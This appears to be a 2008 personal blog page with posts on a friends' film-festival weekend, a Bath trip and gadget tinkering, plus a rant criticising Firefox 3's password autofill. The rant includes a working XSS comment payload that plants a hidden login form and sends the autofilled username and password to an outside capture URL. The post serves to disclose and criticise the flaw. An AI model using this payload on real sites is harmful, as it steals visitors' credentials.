radiac.net

It has been 2 and a half weeks since LAAFF, so it must be time for a report! The Friday evening saw Tristan, Mark and Meri arrive, followed shortly after by Peter and Charlene, who brought Rock Band. I cooked pizzas and sausage rolls until everyone was full, then I cooked some more just in case. Rock band was played into the night, and resumed in the morning while Laura, Natalie and Simon arrived. We then ate more food, played Mario Kart, and watched the excellent "Ninja Dragon" (which clearly wasn't two unrelated films randomly spliced together) before going out for a curry at the finest Indian restaurant in town. We watched another film, played Soul Calibur, slept (there was room everyone, hurrah), and then played Mario Kart some more before the LAAFF shuttle service took people off to the station. I thought people would drift away gradually depending on how far away they lived, but within an hour of the first person leaving, the house was empty again. Sadness. But apparently everyone had a good time, which is excellent. Thank you to everyone who came, and I know some of you had particularly long journeys, but it was good to meet up again. To re-live the good times, or for the curious non-LAAFF-ers, Natalie has provided photographic proof of the event on flikr.

There has been much news in the past month, but also much activity. More posts shall follow!

This weekend is the 117th LAAFF: Annual Atrocious Film Festival, and is being held in Cheltenham. The organisers are expecting better attendance than the previous 114 film festivals - which consisted of me slowly working my way through my DVD ollection.

I'm now expecting 8 friends from uni to arrive at my flat at some point today or tomorrow. This is sadly down from 10 as two had to drop out, but the up side is that 8 people are more likely to fit in my flat than 10. Especially as they will be sleeping on the floor.

I am now away to buy lots of food. Which will be fun - I don't know when the 8 people are arriving, so I have to buy enough food for 8, but not too much for 4. A challenge indeed, but one that I shall relish. Ooh, relish, there's an idea.

And just to clear up any confusion, the L in LAAFF has to stand for something different every time it's used. That is the law of absurd backronyms.

No entries for weeks? That can mean only one thing - it's business as usual at chateau radiac.

Well, not quite; last week we had a couple of days off and went down to Bath for the day. Went into the bath spa thing for a couple of hours - was very relaxing, especially the steam rooms. Then went over to Shakeaway and had a wander round looking for pigs:

I have also finally joined twitter, so add me or follow me whatever it is you do on this thing.

In my free time over the past few weeks I've been playing with lots of other things on my "really should do that sometime" list, like trying to sync google calendars with my N95, fiddling with some interesting perl modules, reading around other frameworks to get interesting ideas, and buying more domains for sites that definitely will be written at some point in the distant future. Right now I'm fighting with my N95, trying to figure out why it doesn't show up in Vista, combining two of my favouritest things: Vista, and Nokia software. Good times.

Seen moments ago:

rm -rf /usr/lolcat/nginx

That's some serious typo skills - some part of my brain meant to write that. You know that bit in that show where that guy realises he's going insane? I'm that guy.

The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.

In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get in to; there are 4 mouse clicks, all over the screen to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load balanced secure site, for example.

Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.

Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?

I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.

Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!

Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.

But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:

1. Log in to a site that doesn't parse user comments properly.
2. Leave a new comment:

   I LOVE THIS SITE, AAA+++++++=+++!!!1!
   <script>
   document.write('<form style="display:none">' +
     '<input type="text" name="username" id="username">' +
     '<input type="password" name="password"></form>');
   window.onload = function () {
     (new Image).src = 'http://radiac.net/capture?u=' +
       document.getElementsByName('username')[0].value +
       '&p=' + document.getElementsByName('password')[0].value
     ;
   }
   </script>
   

3. Profit.

That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:

I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.

Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!

Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.

Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.

• 15.06.2008 - Flash, Iframes and IE (1 comment)
• 14.06.2008 - Sun's out, trains off (No comments)
• 12.06.2008 - Let's move! (5 comments)
• 30.05.2008 - Obscure Bugs Revisited: IE, HTTPS and Plugins (2 comments)
• 18.05.2008 - Barcelona (3 comments)
• And many more in the archives.